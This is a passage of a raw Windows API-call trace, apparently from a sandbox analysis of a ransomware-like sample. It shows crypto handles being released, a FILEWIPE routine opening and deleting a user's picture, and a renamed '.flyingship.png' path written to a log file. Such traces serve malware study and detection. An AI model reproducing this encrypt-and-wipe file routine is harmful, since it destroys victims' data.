out: hHeap=0x8a0000) returned 1 [0189.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.892] CryptDestroyKey (hKey=0x90af98) returned 1 [0189.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.893] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.894] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.894] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0189.896] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0189.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qiez.png", cAlternateFileName="")) returned 0x90af58 [0189.896] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.897] CharLowerBuffW (in: lpsz="byte[101271]", cchLength=0xc | out: lpsz="byte[101271]") returned 0xc [0189.897] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.897] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.897] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.897] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.899] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.899] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.899] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qiez.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0189.902] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0189.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0189.903] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.903] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.904] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.904] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.904] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.904] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.904] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFilePart=0x0) returned 0x4d [0189.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x166a15e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qiez.png", cAlternateFileName="")) returned 0x90af58 [0189.904] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qiez.png")) returned 1 [0189.908] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x166a15e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qiez.png", cAlternateFileName="")) returned 0 [0189.908] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.909] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0189.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.910] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.910] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.910] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.910] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.911] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.911] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.911] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.911] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.911] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.911] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.911] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.912] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.912] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2de9, lpOverlapped=0x0) returned 1 [0189.912] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.912] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2de9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.912] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0189.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5b) returned 0x9a5de0 [0189.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\n", cchWideChar=91, lpMultiByteStr=0x9a5de0, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 91 [0189.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0189.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0189.912] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5a, lpOverlapped=0x0) returned 1 [0189.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0189.913] HeapFree (in: 